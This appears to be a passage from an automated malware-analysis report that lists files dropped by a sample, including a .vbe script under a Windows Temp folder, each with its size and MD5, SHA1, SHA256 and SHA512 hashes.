SHA5126a16b367a762132172830fd81c41c58ac49de788eed93d4c5526f8f0e6859703b336a137fd8d4fe7088b4110d72e5f4767b6462bc4651769924b67305719f30a
-
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe
Filesize217B
MD5d6da6166258e23c9170ee2a4ff73c725
SHA1c3c9d6925553e266fe6f20387feee665ce3e4ba9
SHA25678ee67a8ae359f697979f4cd3c7228d3235c32d3b611303e070b71414591ba1e
SHA51237a5a18acbb56e5458baebb12a4d3b3229b218eb606be3535d1c30e8e0d4fa969543889c587078456321209fe4503688432f45ff35a7af598b770393e7ae3b05
-
Filesize
255B
MD5e671f9cc2aed08e6153cbac93ecaadbf
SHA1cfd90970f0ae03b1ee956993072708fbb83c62f8
SHA256cae02c1a9b66101ae7dce94b3342e1f9d5280cb82716a1eddad40e5bca926024
SHA51270f99c4a7cc92fde056d3137f37c413e7fea6c1d9977d6535e36171d275351252d6f51c14f7146b7520a1dbc385fa9ff7cfa02afdaa8a81a59ee24f9491370c1
-
Filesize
5.6MB
MD53d3c49dd5d13a242b436e0a065cd6837
SHA1e38a773ffa08452c449ca5a880d89cfad24b6f1b
SHA256e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf
SHA512dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00
-
Filesize
3.9MB
MD545c59202dce8ed255b4dbd8ba74c630f
SHA160872781ed51d9bc22a36943da5f7be42c304130
SHA256d07c47f759245d34a5b94786637c3d2424c7e3f3dea3d738d95bf4721dbf3b16
SHA512fff5b16ae38681ed56782c0f0423560dab45065685d7272424206f43c80486318180aa22d66bd197c8c530e4c24dbaaaa020beb76b619dc767ee59faa27e23ed
-
Filesize
413B
MD532ed5b50a17ecf61f48cee7b5c627fef
SHA19830545cba28549c73779a389797bee23257980b
SHA2565c6be06f05f6f71aee8356475758efcc99423f4fab69942d55b9c3a75fe5cf01
SHA512b946f24a512ddd552281e92962b5746f01605809d5c6b74eca18b13eafda8f1398900d2601f70877c4523f0e5941c89271d9b4d4201486b2f50d195cf0100d2c
-
Filesize
268B
MD51278fc2c3e7a951c41c6f464d94c62a0
SHA1f5b87dd587e1918f5288cc45cc6eb5fefe395af6
SHA256568d2f91830a18caf388370bfd918c398d59d47134eddedb7ad19ab9c741654b
SHA51215cd75419d00f326b0ed04f8f751bbe12ed8a85f2644f81a0abc21b80a7b917ebd3ca1593f49a0d33f9bfca889201d4de4c0001009d1affd1085123ff3d03ffd
-
Filesize
380B
MD50802eca9d7b01bf425ebf6c642598be1
SHA1f1bb4bb86a4cb8c1a6126e40552a555a4a8a63e8
SHA25643036bbb79e02b8d0a2127dc7b220f5650f796bee1e879a48dc94e6c25fbf10e
SHA512b426205b87a5d316668cce00e29d1797437d280be29d01c5941b2c4341f6b5d27516f14ac0c2cd4cfaa7a3f7b8e6c2c9e2a5c23ef367fdc7ddcf1b9d8a8ab85a
-
Filesize
235B
MD5f662af49b3845a52435699ade6cdc3b9
SHA170e30c0b279fdb7e1a6ca2d78b32d362f3b2d9e8
SHA2567d76fb07501476cc4ad76e7754ebc49255951fef724830a2575177e60d9c2535
SHA512423dac5db909d3dca89a4278ee367d62c66476b94c6b5e54f21eb4a1d712a9bd12823f610f6284a0e18686c4b6343aa5ee7bfc75c9608b25c6246de574a27500
-
Filesize
1KB
MD5bf38fe42913aaab3060562f036c56781
SHA12569e40a60e393e85be2c50cfa830c2e1430822c
SHA2560e8f131ad2ed72fddaea0919a88aedfa09cfe5ae30f6fd675ab1fd7ece211cac
SHA51242d67abd60177063dc22601c7b0c76aa53000d3196a2bb4c123d2992b907518850c767b2097e0663941ae6c292d95ef08569156e2a286e996662d541d6986f86
-
Filesize
1KB
MD5acfb6faeec3eb6e047a5a2e7fc46f7c4
SHA1bd7ca4bf6c574dec440c891d55a541a4cc20c376
SHA256003e0aa24c6b8e2110a735f67fbd04e8669846591a5b4e21fe065ccc61fd92b8
SHA5128084ffb6db54d21d869eb4f3d24f5081e0c177bffc703f1717e30b71dbf4898cccef8ef405d634556ef0370ecf67c1715151ae3d47277dea9cf612f73fc1e767